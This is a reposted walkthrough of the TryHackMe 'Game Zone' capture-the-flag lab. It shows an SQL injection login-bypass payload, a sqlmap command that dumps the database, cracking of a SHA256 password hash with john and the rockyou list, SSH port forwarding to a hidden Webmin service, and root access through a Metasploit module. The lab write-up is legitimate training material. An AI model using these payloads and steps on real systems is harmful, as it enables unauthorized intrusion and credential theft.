[Tut] TryHackMe – Game Zone Walkthrough - Printable Version +- Sick Gaming (https://www.sickgaming.net) +-- Forum: Programming (https://www.sickgaming.net/forum-76.html) +--- Forum: Python (https://www.sickgaming.net/forum-83.html) +--- Thread: [Tut] TryHackMe – Game Zone Walkthrough (/thread-100617.html) |
[Tut] TryHackMe – Game Zone Walkthrough - xSicKxBot - 01-20-2023 TryHackMe – Game Zone Walkthrough <div> <div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1071170","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'> <div class="kksr-stars"> <div class="kksr-stars-inactive"> <div class="kksr-star" data-star="1" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="2" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="3" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="4" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="5" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> </p></div> <div class="kksr-stars-active" style="width: 142.5px;"> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> </p></div> </div> <div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div> </p></div> <figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-game-zone-walkthrough/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F9VbXoi9heZM%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure> <h2>CHALLENGE OVERVIEW</h2> <ul> <li><strong>Link</strong>: <a href="https://tryhackme.com/room/gamezone" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/gamezone</a></li> <li><strong>Difficulty</strong>: Easy</li> <li><strong>Target</strong>: user and root flags on a Linux server</li> <li><strong>Highlights</strong>: leveraging port forwarding to expose a webservice from behind a firewall, using <code>sqlmap</code> to find a username and hashed password</li> <li><strong>Tools used</strong>: <code>sqlmap</code>, <code>nmap</code>, <code>dirb</code>, <code>burpsuite</code>, <code>hydra</code>, <code>john the ripper</code>, <code>metasploit</code></li> <li><strong>Tags</strong>: <em>sqli, hashcracking, metasploit, ssh tunnel</em></li> </ul> <div class="wp-block-image"> <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="372" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png" alt="" class="wp-image-1071175" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png 1024w, https://blog.finxter.com/wp-content/uploads/2023/01/image-206-300x109.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-206-768x279.png 768w, https://blog.finxter.com/wp-content/uploads/2023/01/image-206.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <h2>BACKGROUND</h2> <div class="wp-block-image"> <figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png" alt="" class="wp-image-1071207" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png 1024w, https://blog.finxter.com/wp-content/uploads/2023/01/image-215-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-215-768x513.png 768w, https://blog.finxter.com/wp-content/uploads/2023/01/image-215.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <p>In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!</p> <h2>IPs</h2> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.163.79 export myIP=10.6.2.23</pre> <h2>ENUMERATION/RECON</h2> <div class="wp-block-image"> <figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png" alt="" class="wp-image-1071212" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png 1024w, https://blog.finxter.com/wp-content/uploads/2023/01/image-216-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-216-768x512.png 768w, https://blog.finxter.com/wp-content/uploads/2023/01/image-216.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <p>Let’s kick things off with our standard <code>nmap</code> and <code>dirb</code> scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.</p> <p>To find the character’s name on the main page, we can do a reverse image search on google. I’ve played this title before but forgot his name, so I just googled “<em>hitman game character name</em>” to find the answer to our first question. (agent 47)</p> <h2>NMAP SCAN RESULTS</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="653" height="535" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png" alt="" class="wp-image-1071177" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png 653w, https://blog.finxter.com/wp-content/uploads/2023/01/image-207-300x246.png 300w" sizes="(max-width: 653px) 100vw, 653px" /></figure> </div> <h2>DIRB SCAN RESULTS</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="479" height="654" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png" alt="" class="wp-image-1071178" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png 479w, https://blog.finxter.com/wp-content/uploads/2023/01/image-208-220x300.png 220w" sizes="(max-width: 479px) 100vw, 479px" /></figure> </div> <h2>WALK THE WEBSITE</h2> <p>We see a login portal on the landing page of our target IP. We also look at the <code>/images</code> folder that <code>dirb</code> found, but nothing remarkable is there at first glance.</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="489" height="543" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png" alt="" class="wp-image-1071179" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png 489w, https://blog.finxter.com/wp-content/uploads/2023/01/image-209-270x300.png 270w" sizes="(max-width: 489px) 100vw, 489px" /></figure> </div> <p>Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">' or 1=1 -- -</pre> <p>The login trick works, and we are presented with a search box.</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="484" height="156" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png" alt="" class="wp-image-1071180" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png 484w, https://blog.finxter.com/wp-content/uploads/2023/01/image-210-300x97.png 300w" sizes="(max-width: 484px) 100vw, 484px" /></figure> </div> <h2>INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png" alt="" class="wp-image-1071217" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png 469w, https://blog.finxter.com/wp-content/uploads/2023/01/image-218-200x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure> </div> <p>Let’s fire up <code>burpsuite</code> now to intercept an HTTP-post request made with this search box.</p> <p>Intercepted HTTP-post request:</p> <pre class="wp-block-preformatted"><code>POST /portal.php HTTP/1.1 Host: 10.10.134.32 Content-Length: 17 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.134.32 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.134.32/portal.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5 Connection: close searchitem=hitman</code> </pre> <p>We’ll save this request in a file titled <code>req</code>. </p> <p>If you use <code>burpsuite</code> to capture the request, you can directly download it as a file. A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the <code>sqlmap</code> command. </p> <h2>USING SQLMAP TO EXTRACT THE FULL DATABASE </h2> <div class="wp-block-image"> <figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png" alt="" class="wp-image-1071214" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png 1024w, https://blog.finxter.com/wp-content/uploads/2023/01/image-217-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-217-768x513.png 768w, https://blog.finxter.com/wp-content/uploads/2023/01/image-217.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <p>With the following command, we can instruct <code>sqlmap</code> to attempt to download (dump) the entire database and search for login username and hashed password.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sqlmap -r req --dbms=mysql --dump --level 5</pre> <p>It worked! We see that the database stores a list of game titles and reviews. </p> <p>The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">+------------------------------------------------------------------+----------+ | pwd | username | +------------------------------------------------------------------+----------+ | ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 | </pre> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="948" height="427" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png" alt="" class="wp-image-1071185" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png 948w, https://blog.finxter.com/wp-content/uploads/2023/01/image-211-300x135.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-211-768x346.png 768w" sizes="(max-width: 948px) 100vw, 948px" /></figure> </div> <p>We can see that it is probably a SHA256 encrypted string. Now it’s time to …</p> <h2>CRACK THAT HASH WITH JOHN (THE RIPPER)!</h2> <div class="wp-block-image"> <figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png" alt="" class="wp-image-1071220" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png 1024w, https://blog.finxter.com/wp-content/uploads/2023/01/image-219-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-219-768x512.png 768w, https://blog.finxter.com/wp-content/uploads/2023/01/image-219.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256</pre> <p><code>rockyou.txt</code> is a legendary leaked database of passwords (14,344,391 passwords!)</p> <p>Output:</p> <pre class="wp-block-preformatted"><code>Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x]) Warning: poor OpenMP scalability for this hash type, consider --fork=4 Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status videogamer124 (?) 1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912 Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably Session completed</code> </pre> </p> <h2>SSH INTO THE BOX AND GRAB THE USER FLAG</h2> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]</pre> <p>We are in!</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ cat user.txt 64—---digits omitted—--------5c </pre> <h2>PRIVILEGE ESCALATION</h2> <p>This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener. </p> <p>Let’s check for hidden services running on ports that may be behind a firewall. We can use the ss utility to check out all of the data connections from each port on our target machine.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ ss -t -u -l -p -n</pre> <p>Output:</p> <pre class="wp-block-preformatted"><code>Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 *:10000 *:*</code></pre> <p>This first line is curious. It appears that a service is running on port 10000 of the target system. </p> <p>Let’s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used for server tools and configuration services.</p> <h2>SET UP PORT FORWARD WITH SSH</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png" alt="" class="wp-image-1071221" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png 469w, https://blog.finxter.com/wp-content/uploads/2023/01/image-220-200x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure> </div> <p>The following command will activate port forwarding via ssh:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -L 10000:localhost:10000 [email protected] password: —-cracked-password—- Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 109 packages can be updated. 68 updates are security updates. Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23 agent47@gamezone:~$ </pre> <p>We are connected now with port forwarding in place. Let’s navigate in our browser to <code>http://$targetIP:10000</code></p> <p>After logging in with the same <code>username:password</code> combination we used with <code>ssh</code>, we are given access to a webmin portal.</p> <h2>PRIVESC WITH METASPLOIT</h2> <div class="wp-block-image"> <figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png" alt="" class="wp-image-1071223" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png 1024w, https://blog.finxter.com/wp-content/uploads/2023/01/image-221-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-221-768x511.png 768w, https://blog.finxter.com/wp-content/uploads/2023/01/image-221.png 1056w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <p>Searching for <code>webmin</code> in Metasploit brings up the following Metasploit module.</p> <p>Let’s use it and set it up with the following options:</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="863" height="608" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png" alt="" class="wp-image-1071190" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png 863w, https://blog.finxter.com/wp-content/uploads/2023/01/image-212-300x211.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-212-768x541.png 768w" sizes="(max-width: 863px) 100vw, 863px" /></figure> </div> <p>Let it rip! </p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">run</pre> <p>And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sessions -i 0</pre> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="383" height="349" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png" alt="" class="wp-image-1071191" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png 383w, https://blog.finxter.com/wp-content/uploads/2023/01/image-213-300x273.png 300w" sizes="(max-width: 383px) 100vw, 383px" /></figure> </div> <p>And we now have our root flag! Thanks for reading this write-up.</p> </div> https://www.sickgaming.net/blog/2023/01/19/tryhackme-game-zone-walkthrough/ |